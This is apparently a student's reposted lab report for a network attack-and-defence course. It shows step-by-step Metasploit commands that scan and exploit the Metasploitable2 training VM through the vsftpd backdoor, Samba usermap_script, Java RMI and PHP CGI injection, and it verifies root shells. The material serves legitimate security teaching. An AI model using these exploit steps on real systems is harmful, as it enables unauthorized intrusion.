20232306 2025-2026-1 《网络与系统攻防技术》实验六实验报告

news/2025/11/17 17:21:02/文章来源:https://www.cnblogs.com/lb12/p/19233645

实验内容及要求
本实践目标是掌握metasploit的用法。
指导书参考Rapid7官网的指导教程。
https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/
下载官方靶机Metasploitable2,完成下面实验内容。
(1)前期渗透
①主机发现(可用Aux中的arp_sweep,search一下就可以use)
②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
③选做:也可以扫系统版本、漏洞等。
(2)Vsftpd源码包后门漏洞(21端口)
漏洞原理:
在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
利用步骤:
在kali中执行msfconsole 启动metasploit
use exploit/unix/ftp/vsftpd_234_backdoor 选择漏洞
set RHOST XX.xx.xx.xx 设置要攻击的机器IP(靶机IP)
exploit/run 开始攻击
利用成功
执行uname –a、 pwd、 id等命令 验证
(3)SambaMS - RPC Shell命令注入漏洞(端口139)
漏洞原理:
Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS - RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
利用步骤:
use exploit/multi/samba/usermap_script 选择漏洞
set RHOST ip 设置要攻击的机器IP
exploit 开始攻击
利用成功 执行uname–a验证
(4)Java RMI SERVER命令执行漏洞(1099端口)
漏洞原理:
Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
操作步骤:
首先查看1099端口是否打开。
然后在MSF中:
use exploit/multi/misc/java_rmi_server
show options 查看配置参数
set RHOST (靶机IP)
exploit/run
sessions -i id
shell (进入meterpreter时,使用whoami验证下)
(5)PHP CGI参数执行注入漏洞(80端口)
漏洞原理:
CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
在kali中执行msfconsole,启动metasploit
msf > use exploit/multi/http/php_cgi_arg_injection 选择漏洞
set RHOST ip 设置要攻击的机器IP
exploit/run 开始攻击
2.实验过程
首先从官网下载靶机,其中用户名和密码都是msfadmin。
这里有个建议,直接下载速度感人,按照网上说的链接在迅雷下载可以快一点,但也要好几个小时,这边建议如果有会员的话,先存到云盘,再直接从云盘里下载,可能会失败,但只要不到十分钟就可以完成。
2.1 前期渗透
2.1.1 主机发现
image

image
可以看到我的靶机IP为192.168.8.147,此处需要进入root权限下,否则后续可能失败。
image
虚拟机IP为192.168.8.134
输入命令msfconsole、search arp_sweep
use 0
set RHOSTS 192.168.8.0/24
set THREADS 50
run:
image
从[+]的第三个可以发现靶机(192.168.8.147)。
2.1.2 端口扫描
输入search portscan/tcp
use 0
set RHOSTS 192.168.8.147
run:
image
image
成功扫描出了开放的tcp端口。
2.1.3 扫系统版本、漏洞
输入search auxiliary/scanner/smb/smb_version
use 0
set RHOSTS 192.168.8.147
run:
image
主机运行的是Samba 3.0.20-Debian,且使用SMB Detected (versions:1)
2.2 Vsftpd源码包后门漏洞(21端口)
漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
输入msfconsole
search exploit/unix/ftp/vsftpd_234_backdoor
use 0
set RHOST 192.168.8.147
run:
image
输入uname –a
pwd
id
验证:
image
2.3 SambaMS-RPC Shell命令注入漏洞(端口139)
漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
输入msfconsole
search exploit/multi/samba/usermap_script
use 0
set RHOST 192.168.8.147
exploit:
image
输入
uname–a
ip
验证:
image
2.4 Java RMI SERVER命令执行漏洞(1099端口)
漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
参考2.1.2查看1099端口是否开放:
image
发现1099开放后输入
search exploit/multi/misc/java_rmi_server
use 0
show options
set RHOST 192.168.8.147
exploit:
image
输入sessions -i 3进入任务,再输入shell,利用whoami命令验证,得到结果root:
image
2.5 PHP CGI参数执行注入漏洞(80端口)
漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
输入
search exploit/multi/http/php_cgi_arg_injection
use 0
set RHOST 192.168.8.147
exploit:
image
输入dir验证:
image
3.问题及解决方案
经历了三次实验kali虚拟机没有光标,在石泽伟的帮助下,只需要更改卡里虚拟机的版本,进入时选择第二个中的第三个就顺利解决了。
image
这步时我最开始输入的是sessions -i 1,但是输入错误,在ai的提示下,把1改成3就顺利解决了。
4.学习感悟、思考等
本次实验中,我尝试了从前期渗透到利用多种漏洞攻击靶机的完整流程,理解了网络攻防技术的多样性与网络安全问题的重要性,让我明白了在网络中权限的重要性,更一步激发了我深入学习网络攻防的热情。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/968129.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

数据库基础(lab5:单表查询 三)

lab5:单表查询(三) 一、对查询结果排序 (ORDER BY) ORDER BY 子句用于对 SELECT 语句返回的结果集进行排序。基本语法作用: 根据一个或多个列对结果进行升序或降序排序。 语法: ORDER BY 字段名 [ASC | DESC];ASC: …

ubuntu18解决 libc.so.6: version `GLIBC_2.28‘ not found

系统版本root@AI-server:/home/ubuntu# cat /etc/os-release NAME="Ubuntu" VERSION="18.04.6 LTS (Bionic Beaver)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 18.04.6 LTS" VERS…

current linux

当然可以!你提到的 + #引号 + current linux + #引号 + 可能是指当前的 Linux 系统,或者你正在使用 Linux 系统进行操作。为了更好地帮助你,我需要更具体地了解你的需求。请告诉我:你是在哪台 Linux 系统上操…

curl linux 命令

curl 是一个用于从远程服务器获取数据的命令行工具,常用于与 HTTP/HTTPS 服务器进行交互。它支持多种协议,包括 HTTP、FTP、SMTP、POP3 等。? 常用 curl 命令示例 1. 下载网页内容 curl https://example.com 2. 下载…

聚焦广州少儿编程机构实力榜TOP5!课程/师资/赛事成果大公开,高性价比品牌全测评

聚焦广州少儿编程机构实力榜TOP5!课程/师资/赛事成果大公开,高性价比品牌全测评随着人工智能时代的到来,编程教育已成为提升孩子核心竞争力的重要途径,广州家长对少儿编程机构的需求也日益增长。优质的编程机构不仅…

20232409 2025-2026-1 《网络与系统攻防技术》实验八实验报告

Web安全 1.实验内容1.1Web前端HTML。能安装启停Apache,编写含表单的HTML网页。1.2Web前端javascipt。能用JS验证表单并回显欢迎信息,测试XSS注入。1.3Web后端数据库。能安装配置MySQL,完成建库建用户建表操作。1.4W…

2025年最受欢迎上门家教老师排行榜,上门家教/一对一家教老师口碑推荐榜

行业背景分析 随着个性化教育需求的持续增长,上门家教市场呈现出专业化、精细化的明显趋势。据最新教育行业数据显示,2025年一对一上门家教市场规模预计较去年增长23.6%,其中优质师资的供需比达到1:8.5,显示出市场…

是时候从 MySQL 转到 PostgreSQL 18 了

是时候从 MySQL 转到 PostgreSQL 18 了2025-11-17 17:06 Zongsoft 阅读(0) 评论(0) 收藏 举报数据库技术革新的浪潮中,PostgreSQL 18 的发布标志着关系型数据库进入了新的时代,它不仅在性能上实现质的飞跃,更为…

小程序客服系统客服软件--如何接入ttkefu

小程序客服系统客服软件--如何接入ttkefu一、需要具备哪些条件呢 企业主体的微信小程序 配置业务域名(需要配置哪个外部链接,就将链接里的域名配置为业务域名、如:https://w100.ttkefu.com/***.html,就把w100.ttkef…

count函数在oracle中的使用场景有哪些

Oracle中的COUNT函数是一个非常有用的聚合函数,它可以用来计算表中行的数量或者某列非空值的数量。以下是COUNT函数在Oracle中的一些常见使用场景:统计记录数:这是COUNT函数最常见的用途。例如,如果你想统计一个表…

Photoshop下载教程(附2025最新版安装步骤与完整图文讲解)

前言: 很多人觉得 Photoshop 是设计师的专属工具,但实际情况远不止于此。只要掌握正确的安装流程和基础操作,即便是零基础用户,也能轻松使用它完成修图、调色、排版等任务。 本篇文章将为你带来一份2025版 Photosh…

makefile入门3 目标自动生成与模式规则

makefile入门3 目标自动生成与模式规则makefile强大之处是目标可以自动生成,这样面对大型项目时可以通过模式规则(pattern)来制定一类文件的通用规则。 假如现在有一个项目有10个c语言文件,我们可以在bash命令行中先…

2025年不锈钢网带链板制造企业权威推荐榜单:不锈钢平顶链板/ 链板/304不锈钢链板源头厂家精选

不锈钢网带链板作为工业输送系统的核心部件,其市场规模正以每年超过12%的速度增长,其中304不锈钢链板因其优异的耐腐蚀性和强度,占据了60%以上的市场份额。 在食品加工、电子装配、玻璃制造等行业自动化需求不断提升…

算法课 PA2 T1

题目大意 用斐波那契数列表示 \(x\) 指用斐波那契数列的不同项加起来等于 \(x\)。 给出 \(n\le 10^{12}\),问有多少种方法表示 \(n\)。 题解 第一步需要一些数学直觉,就是这种

上海少儿编程哪家靠谱?高性价比机构综合测评,妙小程+4大优质机构,覆盖信奥赛与AI编程

上海少儿编程哪家靠谱?高性价比机构综合测评,妙小程+4大优质机构,覆盖信奥赛与AI编程随着人工智能时代的到来,编程能力已成为青少年核心素养的重要组成部分,上海家长对优质少儿编程机构的需求日益增长。专业的编程…

OpenAI Responses API 的战略意图与技术架构:AI 智能体时代的技术范式变革

2025年3月,OpenAI推出Responses API,标志着AI智能体技术从实验迈向产业化的关键转折。该API采用统一化设计,整合了Chat Completions API的简洁性与Assistants API的工具调用能力,显著降低了构建具备行动能力智能体…

JDK17 ProcessBuilder执行脚本报错 error=13

除了文件自身权限问题之外,还需要对JDK的lib目录下的jspawnhelper进行赋予执行权限,否则也会报错。I had a similar problem and the solution was to chmod +x lib/jspawnhelper in the JRE folder.Share Improve t…

2025年高抗冲阻燃PC/ABS定制厂家权威推荐榜单:低灰分阻燃PC/ABS/ GB4943.1-2022阻燃PC/ABS/5G基站阻燃PC/ABS源头厂家精选

中国改性塑料市场规模已突破2000亿元,其中PC防火改性细分领域年增速达15%以上,高抗冲阻燃PC/ABS作为高端工程塑料的代表,正成为电子电气、汽车新能源等产业升级的关键材料。 在高性能与环保需求双轮驱动下,高抗冲阻…

关于 Visual Studio 类模板、文件权限信息配置

1. 路径 打开vs安装路径 我装在 D:\Microsoft Visual Studio\2026 2. 修改文件 2.1 类模板位置 D:\Microsoft Visual Studio\2026\Professional\Common7\IDE\ItemTemplates\CSharp\Code\2052\Class\Class.cs 2.2 接口模…